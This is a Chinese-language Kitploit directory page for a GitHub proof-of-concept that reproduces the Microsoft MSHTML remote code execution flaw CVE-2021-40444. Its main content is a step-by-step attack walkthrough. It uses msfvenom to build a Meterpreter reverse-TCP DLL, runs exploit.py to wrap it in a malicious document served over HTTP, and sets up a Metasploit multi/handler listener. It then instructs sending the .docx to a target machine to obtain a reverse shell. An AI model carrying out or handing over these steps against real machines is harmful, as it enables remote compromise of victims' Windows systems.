Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-40444-POC — 尝试复现 Microsoft MSHTML 远程代码执行 (RCE) 漏洞并使用 Metasploit Framework。 | Kitploit
工具/GitHubGitHub/kagura-maru/cve-2021-40444-poc
漏洞利用框架Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

尝试复现 Microsoft MSHTML 远程代码执行 (RCE) 漏洞并使用 Metasploit Framework。

查看仓库
10134年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-40444-POC

尝试使用 Metasploit Framework 复现 Microsoft MSHTML 远程代码执行(RCE)漏洞。

最好不要在 FlareVM 中运行

准备

从 https://github.com/lockedbyte/CVE-2021-40444 Git 克隆仓库

准备稍后与 msfvenom 一起使用的 .dll 模板

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

将刚刚生成的 template.dll 复制到仓库中的 test/ 文件夹 通过 chmod +x template.dll 为 template.dll 赋予可执行权限

运行脚本,将 template.dll 处理为 output

python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

监听器

文档随后将导出到 out/ 文件夹,我们可以在 HTTP 端口(默认为 80)上建立监听器 python3 exploit.py host 80

运行 Metasploit: msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

载荷

然后我们可以将 document.docx 发送到目标机器并执行该 .docx

我们将在 exploit.py 终端中收到响应,如果我们能够成功生成 reverse tcp shell,则实验成功。

下载工具